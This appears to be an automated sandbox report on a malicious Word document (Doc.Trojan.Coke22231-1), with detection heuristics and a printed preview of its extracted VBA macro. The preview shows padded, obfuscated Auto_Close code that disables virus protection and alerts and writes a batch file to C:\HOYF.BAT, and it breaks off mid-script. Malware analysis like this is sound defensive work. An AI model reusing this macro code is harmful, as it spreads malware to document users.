Verdict: MALICIOUS
Risk Score: 300

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a malicious OLE document containing a VBA macro. The Auto_Close macro is configured to execute a command via the Shell() function. This is a common technique for downloading and executing additional malware. The ClamAV detection further confirms its malicious nature.
Heuristics (6)

- ClamAV: Doc.Trojan.Coke22231-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Coke22231-1
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 153108 bytes |

SHA-256: afe95e8c6405313b1879f9ad94867bed8624429ba8a91d204c68acc3acf34818

Detection:
- ClamAV: Doc.Trojan.Coke22231-1
- Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1TemplateProject.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'vCVforWv
Sub AUtOCloSE()
On Error Resume Next
KGOL = 1
If hKTtYiuXX > BsjBPNee Then
bhass = 77
End If
Application.DisplayAlerts = wdAlertsNone
If TfiPP > srdHOpee Then
If EPJnOwXX = AsFvxTT Then
If yRJee < tgnGXypll Then
If hbGPHII > PiRDyWNtt Then
rTceeBFsomTiAA$ = "KmryjDff"
oUeHOOFWnHH$ = "AbKEE"
End If
RscsVV = 12
XGNOQQoeCByBXX$ = "TQaIcc"
If FiRmgWluu = dxLlShh Then
KCgVJJUBDcLSS$ = "vmbKOO"
If RVujuu = RKxwSsAA Then
If kYXfBB < JdadJACC Then
End If
If csKQQ = OgIIIVBpp Then
End If
If qBMiQiww = dujcFPuu Then
End If
End If
End If
End If
If IAicc > iuyKXX Then
'iRiXqkktTvkdd
End If
mTNGGIsArr$ = "sPPOrCC"
'RVHqQNwYYrwvHH
End If
ouGAWW = 25
End If
ssmRRRYFyBCC$ = "GChuu"
'clFfciiwkBvEoo
skmYY = 11
Options.ConfirmConversions = False
For uOwQovOO = 57 To 2
If FRUHnn > oHkVoII Then
If UmObnXX > PECVXuVLL Then
UsxcWlGG = 65
If rFjOMxfii = teFfDLTT Then
XKkossOHAEXrfBB$ = "WxREMjff"
BvBTooeNFLL$ = "vrqjj"
PWXneeObMgVwjj$ = "VFkOfuCC"
End If
End If
eFUCbbvYpstjiNN$ = "oEKpXaSS"
End If
Next uOwQovOO
pQymbEEaoHAYxx$ = "XXgDll"
If FgKkmUWW < juaoRstff Then
heBPYWeecuqCXjCC$ = "PesfKTT"
End If
ShowVisualBasicEditor = False
'iuNlaykkfWbUpqq
sacUQskBB = 72
If KwoVmNVV > EbEGG Then
If kvUNN = AWKQoTcc Then
If hSUmRoo = rCxGajHH Then
If kmmRR = BimmOyy Then
Rem iasOOYREpQPP
NFbdmyQKK = 13
End If
If rdScKK < RvWTeDD Then
If FMPMdhll = vbNQIII Then
If WDTBmDD = TeRXwYvv Then
End If
If dehww < JOtOdCuu Then
End If
If gXxRFfOO > gefqCiuaa Then
End If
nUEPqTTTkacBggg$ = "EocJICbRR"
End If
vWaammYitkKDNEE$ = "TUUUtaa"
End If
aDWtOlgGGSgcSOO$ = "efSYNTGG"
End If
bxxAA = 26
fDkPRRGCiCJJ$ = "lKNHBpvv"
If jxXHH = FXXUdKK Then
Rem DcPmWAiioLCXll
PqagIpNvvWLqHH$ = "NdARR"
End If
End If
If KysMgg < CKuss Then
Rem YQKGCwwAFMynRee
EqnXhVIIKiQQll$ = "JNFxx"
End If
End If
RKmQFCnaG = 1
DSMunJAppbGjmhh$ = "TwSjxCxdd"
wDMVvWxSS = 86
If iHyBBdJnn < tgaVrjww Then
dFWXvAqXX = 32
End If
If FbPrr > Vafxbb Then
'wvbEFWjjnLIOEacc
'PrqQLwweEGhDcaTT
End If
'cuQhttuhoMM
Options.VirusProtection = False
ohtLXhh = 88
'sEmYYSPiQQQ
Options.SaveNormalPrompt = False
SrcqMhCccTNTGG$ = "kPxmm"
If lCCrMff = mNxUmxx Then
If ndhQcTmm > DekDRR Then
If WraSS = GHSitll Then
Rem HXVDJJLJILndRll
ToeVV = 75
End If
WhRAA = 30
DXvUcXX = 88
End If
Rem JeYALUWxxVutdnlLvv
If ruikk < EXnUaa Then
'vvkpGiieiPurll
End If
End If
Open "C:\HOYF.BAT" For Output As 1
For JEEeAdAMM = 27 To 7
balPcbMKK = 11
If aDQjj < rleQQtww Then
If nsOWLHH > HgPIyy Then
If WvjOyvlOO = malHOO Then
If IFygg > vGDuqAA Then
For dXaQfyy = 17 To 2
Next dXaQfyy
If BTTNgff < YoUdBUWW Then
End If
If JeGsqSjj = bLHoo Then
End If
For vwdMtJJ = 14 To 5
Next vwdMtJJ
End If
If bodYY = Ifuss Then
XVoBTHH = 14
Rem CCJmjwOKKopwxXJXX
End If
If yxDoSKFoo > NrRoSS Then
If LUXNhh = uenrLL Then
End If
Rem ThBGLBDDmDbnrpuu
End If
Rem xeXtyosIINUrLL
End If
vwjgxx = 60
End If
ooOhqdhttUwotCSkk$ = "BqWSMKK"
End If
ebgJwuPPofAfmgww$ = "iJillPKK"
Next JEEeAdAMM
nqLGCC = 80
nkjII = 88
Print #1, "@ECHO OFf"
qTWvUqpPPNjqXQGqnn$ = "YGHTFff"
'fVtqqlKlVeGG
eVRmFLgDDgunUoo$ = "KFOVVV"
If TnOppp = jQeSMvv Then
If QfMreXX > TiTnTT Then
If cWmUIgg > WPSLDuu Then
If votFCC = CARBckk Then
If arCoAA < FgOHrRhh Then
If VJNDvv = kbhtt Then
End If
ISHallFgEqYY$ = "CdUEqNN"
If xsjwMJqq = HLehqhss Then
End If
If qCvDSbOff < yjnWpp Then
End If
End If
If jWjEQQ = NUYYXrHhh Then
If EuUxoo < lvjvtiYY Then
End If
If LVJnjj > VRDkawoo Then
End If
If NLrTss = lTDett Then
End If
'qaAupcqHHOhIdwhoww
If gwfyy < kRVTFF Then
End If
End If
aPIbb = 77
CyrbGeOqqYSVWbb$ = "IipSqRR"
End If
KgYCQQpKVtvv$ = "xaubRbb"
If qDtHAA = skHiyLww Then
If kgfXREFF < wIQWIXX Then
If dbJqCC < QpEIfAoo Then
End If
If LNLRfrr > eHXGERBB The ... (truncated)
```